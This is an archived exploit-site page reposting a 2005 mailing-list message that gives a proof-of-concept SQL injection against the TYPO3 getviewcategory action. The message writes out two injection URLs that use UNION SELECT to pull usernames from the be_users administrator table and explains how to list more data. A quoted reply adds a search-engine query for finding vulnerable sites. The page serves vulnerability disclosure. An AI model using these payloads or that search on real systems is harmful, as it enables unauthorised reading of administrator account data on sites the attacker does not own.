what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

typo3sql.txt

typo3sql.txt
Posted Mar 5, 2005
Authored by james | Site gulftech.org

TYPO3 SQL injection proof of concept exploit.

tags | exploit, sql injection, proof of concept
SHA-256 | 226a9a103cb644685e94a798222ffe152e90b1f5a8022289a4ce13be5f50ad10

typo3sql.txt

Change Mirror Download
Here is a POC for the typo3 issue to test if you are vulnerable. This
doesn't pull the password, just the username :)

http://path/?&action=getviewcategory&category_uid=-99%20UNION%20SELECT%20use
rname%20FROM%20be_users%20WHERE%20uid=1/*

Also, it's easy to pull lists of data from the database using this
vulnerability since the query results are looped and displayed. Take the
following example. It would list usernames as categories

http://path/?&action=getviewcategory&category_uid=-99%20UNION%20SELECT%20use
rname,null%20FROM%20be_users%20WHERE%201/*

James

-----Original Message-----
From: Sebastian Wolfgarten [mailto:sebastian@wolfgarten.com]
Sent: Thursday, March 03, 2005 5:07 PM
To: bugtraq@securityfocus.com
Subject: Re: TYPO3 SQL Injection vunerabilitie

Hi Dennis,

I am pretty sure Fabian (Neonomicus) meant *every link* (or site) generated
by
Typo3, didn't he? For instance if you search google for
"inurl:action=getviewcategory" I am pretty sure you will understand what he
meant (or am I wrong here)?

@Fabian (Neonomicus): Could you please provide more details about the
vulnerability you've discoveredl? By the way did you give the Typo3 guys
*enough* time to respond???

All the best,
Sebastian

--
No virus found in this incoming message.
Checked by AVG Anti-Virus.
Version: 7.0.300 / Virus Database: 266.5.5 - Release Date: 3/1/2005



--
No virus found in this outgoing message.
Checked by AVG Anti-Virus.
Version: 7.0.300 / Virus Database: 266.5.5 - Release Date: 3/1/2005


Login or Register to add favorites

File Archive:

August 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    15 Files
  • 2
    Aug 2nd
    22 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    11 Files
  • 7
    Aug 7th
    43 Files
  • 8
    Aug 8th
    42 Files
  • 9
    Aug 9th
    36 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    27 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close